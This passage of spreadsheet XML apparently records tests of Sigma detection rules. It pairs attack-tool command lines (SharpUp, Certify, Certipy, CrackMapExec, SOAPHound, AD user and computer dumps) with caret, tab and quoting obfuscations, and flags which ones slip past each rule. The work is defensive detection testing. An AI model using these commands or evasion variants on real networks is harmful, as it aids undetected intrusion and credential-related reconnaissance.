        </is>
      </c>
      <c r="F1933" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1933" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1933" s="44" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1933" s="44" t="n"/>
      <c r="K1933" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1934" ht="15.75" customHeight="1" s="42">
      <c r="A1934" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1934" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1934" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1934" s="44" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1934" s="44" t="inlineStr">
        <is>
          <t>gpresult.exe "/z"</t>
        </is>
      </c>
      <c r="F1934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1934" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1934" s="44" t="n"/>
      <c r="J1934" s="44" t="n"/>
      <c r="K1934" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1935" ht="15.75" customHeight="1" s="42">
      <c r="A1935" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1935" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1935" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1935" s="44" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1935" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c gpresult.exe /z^</t>
        </is>
      </c>
      <c r="F1935" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1935" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1935" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1935" s="44" t="n"/>
      <c r="K1935" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1936" ht="15.75" customHeight="1" s="42">
      <c r="A1936" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1936" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1936" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1936" s="44" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1936" s="44" t="inlineStr">
        <is>
          <t>gpresult.exe	/z</t>
        </is>
      </c>
      <c r="F1936" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1936" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1936" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1936" s="44" t="n"/>
      <c r="K1936" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1937" ht="15.75" customHeight="1" s="42">
      <c r="A1937" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1937" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1937" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1937" s="44" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1937" s="44" t="inlineStr">
        <is>
          <t>gpresult.exe /Z</t>
        </is>
      </c>
      <c r="F1937" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1937" s="44" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information (e56d3073-83ff-4021-90fe-c658e0709e72)</t>
        </is>
      </c>
      <c r="J1937" s="44" t="n"/>
      <c r="K1937" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1938" ht="15.75" customHeight="1" s="42">
      <c r="A1938" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1938" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C1938" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D1938" s="44" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E1938" s="44" t="inlineStr">
        <is>
          <t>SharpUp.exe "audit"</t>
        </is>
      </c>
      <c r="F1938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1938" s="44" t="n"/>
      <c r="J1938" s="44" t="n"/>
      <c r="K1938" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1939" ht="15.75" customHeight="1" s="42">
      <c r="A1939" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1939" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C1939" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D1939" s="44" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E1939" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpUp.exe Hijackable^Paths</t>
        </is>
      </c>
      <c r="F1939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1939" s="44" t="n"/>
      <c r="J1939" s="44" t="n"/>
      <c r="K1939" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1940" ht="15.75" customHeight="1" s="42">
      <c r="A1940" s="44" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1940" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C1940" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D1940" s="44" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E1940" s="44" t="inlineStr">
        <is>
          <t>SharpUp.exe "Hijackable""Paths"</t>
        </is>
      </c>
      <c r="F1940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1940" s="44" t="n"/>
      <c r="J1940" s="44" t="n"/>
      <c r="K1940" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1941" ht="15.75" customHeight="1" s="42">
      <c r="A1941" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1941" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1941" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1941" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1941" s="44" t="inlineStr">
        <is>
          <t>Certify find /vulnerable</t>
        </is>
      </c>
      <c r="F1941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1941" s="44" t="n"/>
      <c r="J1941" s="44" t="n"/>
      <c r="K1941" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1942" ht="15.75" customHeight="1" s="42">
      <c r="A1942" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1942" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1942" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1942" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1942" s="44" t="inlineStr">
        <is>
          <t>Certify.exe "find" /vulnerable</t>
        </is>
      </c>
      <c r="F1942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1942" s="44" t="n"/>
      <c r="J1942" s="44" t="n"/>
      <c r="K1942" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1943" ht="15.75" customHeight="1" s="42">
      <c r="A1943" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1943" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1943" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1943" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1943" s="44" t="inlineStr">
        <is>
          <t>Certify.exe	find	/vulnerable</t>
        </is>
      </c>
      <c r="F1943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1943" s="44" t="n"/>
      <c r="J1943" s="44" t="n"/>
      <c r="K1943" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1944" ht="15.75" customHeight="1" s="42">
      <c r="A1944" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1944" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certify</t>
        </is>
      </c>
      <c r="C1944" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certify Execution</t>
        </is>
      </c>
      <c r="D1944" s="44" t="inlineStr">
        <is>
          <t>762f2482-ff21-4970-8939-0aa317a886bb</t>
        </is>
      </c>
      <c r="E1944" s="44" t="inlineStr">
        <is>
          <t>Certify.exe find  /vulnerable</t>
        </is>
      </c>
      <c r="F1944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1944" s="44" t="n"/>
      <c r="J1944" s="44" t="n"/>
      <c r="K1944" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1945" ht="15.75" customHeight="1" s="42">
      <c r="A1945" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1945" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1945" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1945" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1945" s="44" t="inlineStr">
        <is>
          <t>Certipy.exe	find	-vulnerable</t>
        </is>
      </c>
      <c r="F1945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1945" s="44" t="n"/>
      <c r="J1945" s="44" t="n"/>
      <c r="K1945" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1946" ht="15.75" customHeight="1" s="42">
      <c r="A1946" s="44" t="inlineStr">
        <is>
          <t>t1649</t>
        </is>
      </c>
      <c r="B1946" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_certipy</t>
        </is>
      </c>
      <c r="C1946" s="44" t="inlineStr">
        <is>
          <t>HackTool - Certipy Execution</t>
        </is>
      </c>
      <c r="D1946" s="44" t="inlineStr">
        <is>
          <t>6938366d-8954-4ddc-baff-c830b3ba8fcd</t>
        </is>
      </c>
      <c r="E1946" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c Certipy.exe find^  -vulnerable</t>
        </is>
      </c>
      <c r="F1946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1946" s="44" t="n"/>
      <c r="J1946" s="44" t="n"/>
      <c r="K1946" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1947" ht="15.75" customHeight="1" s="42">
      <c r="A1947" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1947" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1947" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1947" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1947" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe	smb	192.0.2.10</t>
        </is>
      </c>
      <c r="F1947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1947" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1947" s="44" t="n"/>
      <c r="K1947" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1948" ht="15.75" customHeight="1" s="42">
      <c r="A1948" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1948" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1948" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1948" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1948" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe "smb" 192.0.2.10</t>
        </is>
      </c>
      <c r="F1948" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1948" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1948" s="44" t="n"/>
      <c r="K1948" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1949" ht="15.75" customHeight="1" s="42">
      <c r="A1949" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1949" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1949" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1949" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1949" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe smb  192.0.2.10</t>
        </is>
      </c>
      <c r="F1949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1949" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1949" s="44" t="n"/>
      <c r="K1949" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1950" ht="15.75" customHeight="1" s="42">
      <c r="A1950" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B1950" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C1950" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D1950" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E1950" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\crackmapexec.exe sm^b 192.0.2.10</t>
        </is>
      </c>
      <c r="F1950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1950" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J1950" s="44" t="n"/>
      <c r="K1950" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1951" ht="15.75" customHeight="1" s="42">
      <c r="A1951" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1951" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1951" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1951" s="44" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1951" s="44" t="inlineStr">
        <is>
          <t>SharpLdapWhoami.exe -method:ntlm</t>
        </is>
      </c>
      <c r="F1951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1951" s="44" t="n"/>
      <c r="J1951" s="44" t="n"/>
      <c r="K1951" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1952" ht="15.75" customHeight="1" s="42">
      <c r="A1952" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1952" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1952" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1952" s="44" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1952" s="44" t="inlineStr">
        <is>
          <t>SharpLdapWhoami.exe /method:ntlm</t>
        </is>
      </c>
      <c r="F1952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1952" s="44" t="n"/>
      <c r="J1952" s="44" t="n"/>
      <c r="K1952" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1953" ht="15.75" customHeight="1" s="42">
      <c r="A1953" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1953" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpldapwhoami</t>
        </is>
      </c>
      <c r="C1953" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpLdapWhoami Execution</t>
        </is>
      </c>
      <c r="D1953" s="44" t="inlineStr">
        <is>
          <t>d9367cbb-c2e0-47ce-bdc0-128cb6da898d</t>
        </is>
      </c>
      <c r="E1953" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpLdapWhoami.exe /meth^od:ntlm</t>
        </is>
      </c>
      <c r="F1953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1953" s="44" t="n"/>
      <c r="J1953" s="44" t="n"/>
      <c r="K1953" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1954" ht="15.75" customHeight="1" s="42">
      <c r="A1954" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1954" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_computer_discovery_get_adcomputer</t>
        </is>
      </c>
      <c r="C1954" s="44" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet</t>
        </is>
      </c>
      <c r="D1954" s="44" t="inlineStr">
        <is>
          <t>435e10e4-992a-4281-96f3-38b11106adde</t>
        </is>
      </c>
      <c r="E1954" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "Get-ADComputer  -Filter * | Select * &gt; output.txt"</t>
        </is>
      </c>
      <c r="F1954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1954" s="44" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet (435e10e4-992a-4281-96f3-38b11106adde)</t>
        </is>
      </c>
      <c r="J1954" s="44" t="n"/>
      <c r="K1954" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1955" ht="15.75" customHeight="1" s="42">
      <c r="A1955" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1955" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_computer_discovery_get_adcomputer</t>
        </is>
      </c>
      <c r="C1955" s="44" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet</t>
        </is>
      </c>
      <c r="D1955" s="44" t="inlineStr">
        <is>
          <t>435e10e4-992a-4281-96f3-38b11106adde</t>
        </is>
      </c>
      <c r="E1955" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoLogo -Command "Get-ADComputer -Filter * | Out-File -FilePath output.txt"</t>
        </is>
      </c>
      <c r="F1955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1955" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1955" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1955" s="44" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet (435e10e4-992a-4281-96f3-38b11106adde)</t>
        </is>
      </c>
      <c r="J1955" s="44" t="n"/>
      <c r="K1955" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1956" ht="15.75" customHeight="1" s="42">
      <c r="A1956" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1956" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_computer_discovery_get_adcomputer</t>
        </is>
      </c>
      <c r="C1956" s="44" t="inlineStr">
        <is>
          <t>Computer Discovery And Export Via Get-ADComputer Cmdlet</t>
        </is>
      </c>
      <c r="D1956" s="44" t="inlineStr">
        <is>
          <t>435e10e4-992a-4281-96f3-38b11106adde</t>
        </is>
      </c>
      <c r="E1956" s="44" t="inlineStr">
        <is>
          <t>pwsh -c "Get-ADComputer  -Filter * | Tee-Object -FilePath output.txt"</t>
        </is>
      </c>
      <c r="F1956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1956" s="44" t="n"/>
      <c r="J1956" s="44" t="n"/>
      <c r="K1956" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1957" ht="15.75" customHeight="1" s="42">
      <c r="A1957" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1957" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_user_discovery_get_aduser</t>
        </is>
      </c>
      <c r="C1957" s="44" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet</t>
        </is>
      </c>
      <c r="D1957" s="44" t="inlineStr">
        <is>
          <t>1114e048-b69c-4f41-bc20-657245ae6e3f</t>
        </is>
      </c>
      <c r="E1957" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "&amp; { Get-ADUser  -Filter * } | Select * &gt; output.txt"</t>
        </is>
      </c>
      <c r="F1957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1957" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1957" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1957" s="44" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet (1114e048-b69c-4f41-bc20-657245ae6e3f)</t>
        </is>
      </c>
      <c r="J1957" s="44" t="n"/>
      <c r="K1957" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1958" ht="15.75" customHeight="1" s="42">
      <c r="A1958" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1958" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_user_discovery_get_aduser</t>
        </is>
      </c>
      <c r="C1958" s="44" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet</t>
        </is>
      </c>
      <c r="D1958" s="44" t="inlineStr">
        <is>
          <t>1114e048-b69c-4f41-bc20-657245ae6e3f</t>
        </is>
      </c>
      <c r="E1958" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -NoLogo -ExecutionPolicy Bypass -Command "Get-ADUser -Filter * | Out-File -FilePath output.txt"</t>
        </is>
      </c>
      <c r="F1958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1958" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); User Discovery And Export Via Get-ADUser Cmdlet (1114e048-b69c-4f41-bc20-657245ae6e3f)</t>
        </is>
      </c>
      <c r="J1958" s="44" t="n"/>
      <c r="K1958" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1959" ht="15.75" customHeight="1" s="42">
      <c r="A1959" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B1959" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_user_discovery_get_aduser</t>
        </is>
      </c>
      <c r="C1959" s="44" t="inlineStr">
        <is>
          <t>User Discovery And Export Via Get-ADUser Cmdlet</t>
        </is>
      </c>
      <c r="D1959" s="44" t="inlineStr">
        <is>
          <t>1114e048-b69c-4f41-bc20-657245ae6e3f</t>
        </is>
      </c>
      <c r="E1959" s="44" t="inlineStr">
        <is>
          <t>pwsh -c "Get-ADUser  -Filter * | Tee-Object -FilePath output.txt"</t>
        </is>
      </c>
      <c r="F1959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1959" s="44" t="n"/>
      <c r="J1959" s="44" t="n"/>
      <c r="K1959" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1960" ht="15.75" customHeight="1" s="42">
      <c r="A1960" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1960" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_soaphound_execution</t>
        </is>
      </c>
      <c r="C1960" s="44" t="inlineStr">
        <is>
          <t>HackTool - SOAPHound Execution</t>
        </is>
      </c>
      <c r="D1960" s="44" t="inlineStr">
        <is>
          <t>e92a4287-e072-4a40-9739-370c106bb750</t>
        </is>
      </c>
      <c r="E1960" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\sh.exe --bhdump -c	c:\temp\cache.txt</t>
        </is>
      </c>
      <c r="F1960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1960" s="44" t="n"/>
      <c r="J1960" s="44" t="n"/>
      <c r="K1960" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1961" ht="15.75" customHeight="1" s="42">
      <c r="A1961" s="44" t="inlineStr">
        <is>
